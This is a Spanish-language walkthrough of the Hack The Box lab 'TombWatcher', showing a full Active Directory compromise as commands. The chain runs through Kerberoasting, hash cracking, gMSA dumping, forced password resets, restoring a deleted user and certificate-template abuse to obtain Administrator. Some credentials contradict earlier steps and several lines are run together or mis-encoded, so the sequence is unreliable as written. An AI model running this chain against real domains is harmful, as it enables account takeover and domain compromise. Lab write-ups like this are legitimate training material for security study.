TombWatcher
Machine Information As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
Escaneo:
1 │ # Nmap 7.95 scan initiated Sat Jun 7 19:03:46 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49683,49684,49685,49704,49710,49725,4973
│ 2 -oN targeted 10.10.11.72
2 │ Nmap scan report for 10.10.11.72
3 │ Host is up (0.24s latency).
4 │
5 │ PORT STATE SERVICE VERSION
6 │ 53/tcp open domain Simple DNS Plus
7 │ 80/tcp open http Microsoft IIS httpd 10.0
8 │ | http-methods:
9 │ |_ Potentially risky methods: TRACE
10 │ |_http-server-header: Microsoft-IIS/10.0
11 │ |_http-title: IIS Windows Server
12 │ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-07 23:03:49Z)
13 │ 135/tcp open msrpc Microsoft Windows RPC
14 │ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
15 │ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
16 │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m55s from scanner time.
17 │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
18 │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
19 │ | Not valid before: 2024-11-16T00:47:59
20 │ |_Not valid after: 2025-11-16T00:47:59
21 │ 445/tcp open microsoft-ds?
22 │ 464/tcp open kpasswd5?
23 │ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
24 │ 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
25 │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
26 │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
27 │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
28 │ | Not valid before: 2024-11-16T00:47:59
29 │ |_Not valid after: 2025-11-16T00:47:59
30 │ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
31 │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
32 │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
33 │ | Not valid before: 2024-11-16T00:47:59
34 │ |_Not valid after: 2025-11-16T00:47:59
35 │ |_ssl-date: 2025-06-07T23:05:24+00:00; +3h59m56s from scanner time.
36 │ 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
37 │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
38 │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
39 │ | Not valid before: 2024-11-16T00:47:59
40 │ |_Not valid after: 2025-11-16T00:47:59
41 │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
42 │ 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
43 │ |_http-title: Not Found
44 │ |_http-server-header: Microsoft-HTTPAPI/2.0
45 │ 9389/tcp open mc-nmf .NET Message Framing
46 │ 49666/tcp open msrpc Microsoft Windows RPC
47 │ 49683/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
48 │ 49684/tcp open msrpc Microsoft Windows RPC
49 │ 49685/tcp open msrpc Microsoft Windows RPC
50 │ 49704/tcp open msrpc Microsoft Windows RPC
51 │ 49710/tcp open msrpc Microsoft Windows RPC
52 │ 49725/tcp open msrpc Microsoft Windows RPC
53 │ 49732/tcp open msrpc Microsoft Windows RPC
54 │ Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
55 │
56 │ Host script results:
57 │ |_clock-skew: mean: 3h59m55s, deviation: 0s, median: 3h59m55s
58 │ | smb2-time:
59 │ | date: 2025-06-07T23:04:43
60 │ |_ start_date: N/A
61 │ | smb2-security-mode:
62 │ | 3:1:1:
63 │ |_ Message signing enabled and required
64 │
65 │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
66 │ # Nmap done at Sat Jun 7 19:05:30 2025 -- 1 IP address (1 host up) scanned in 104.46 seconds
Le tiramos el BloodHound:
python3 bloodhound.py -c ALL -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 --zip
WriteSPN
Ataque Kerberoasting
Se utiliza la herramienta targetedKerberoast.py para obtener el hash de Kerberos de un usuario objetivo (Alfred), lo que podrÃa permitir la obtención de la contraseña de este usuario a través de un ataque de Kerberoasting.
python3 targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
Descifrado del Hash de Kerberos
Utilizando John the Ripper, se descifra el hash de Alfred para obtener su contraseña en texto claro.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txtbas----- (?) AddSelf
Verificación de MembresÃas de Grupo para Alfred
Se verifica si Alfred pertenece al grupo INFRASTRUCTURE, lo que permite verificar sus privilegios en el dominio.
net rpc group members "INFRASTRUCTURE" -U tombwatcher.htb/Alfred%'basketball' -S 10.10.11.72ReadGMSAPassword
Obtención de Hash de AS-REP con gMSADumper
Con la herramienta gMSADumper, se obtiene el hash de ansible_dev$, lo que puede permitir realizar un ataque de Pass-the-Hash.
python3 gMSADumper.py -u 'Alfred' -p 'basketball' -d 'tombwatcher.htb'
ForceChangePasswd
Cambio de Contraseña para SAM
Utilizando bloodyAD, se cambia la contraseña del usuario sam con el hash obtenido del paso anterior.
python3 bloodyAD.py -u 'ansible_dev$' -p ':1c37d00093dc2a5f251-----' -d tombwatcher.htb --dc-ip 10.10.11.72 set password sam 'Password123!'[+] Password changed successfully!WriteOwner
Cambio de Contraseña para JOHN
Se cambia la contraseña de JOHN con bloodyAD, ahora utilizando la nueva contraseña de SAM.
python3 bloodyAD.py --host 10.10.11.72 -d tombwatcher.htb -u 'SAM' -p 'Password123!' set password JOHN PasswordJohn2022[+] Password changed successfully!— Conexión con Evil-WinRM —
evil-winrm -i 10.10.11.72 -u john -p 'PasswordJohn2022'
ESCALADA DE PRIVILEGIOS
Restore-ADObject y Certpy
Enumerar Usuarios Eliminados en Active Directory
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List
Restaurar el Objeto de Usuario Eliminado
Para restaurar el objeto de usuario cert_admin, que fue eliminado en el paso anterior, utilizamos el siguiente comando de PowerShell:
Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'Cambio de Contraseña del Usuario Restaurado (cert_admin)
python3 bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb -u JOHN -p 'PasswordJohn2022' set password cert_admin 'PasswordJohn2022''Solicitar Certificado con Certipy
Una vez que la contraseña de cert_admin ha sido cambiada, podemos solicitar un certificado usando Certipy. El objetivo es obtener un certificado de autenticación para Administrator con el template WebServer.
certipy req -u 'cert_admin@tombwatcher.htb' -p 'P@ssw0rd123!' -target dc01.tombwatcher.htb -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'Administrator' -application-policies 'Client Authentication'Autenticación con el Certificado
Una vez obtenido el certificado, utilizamos el siguiente comando para autenticar con el DC de tombwatcher.htb utilizando el certificado.
certipy auth -pfx administrator.pfx -dc-ip 10.10.XX.XX -domain tombwatcher.htb -ldap-shellCambiar la Contraseña de Administrator
Una vez autenticado como Administrator, podemos cambiar la contraseña del usuario Administrator.
# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!Acceso con Evil-WinRM
evil-winrm -i dc01.tombwatcher.htb -u Administrator -p 'P@ssw0rd123!'
Last updated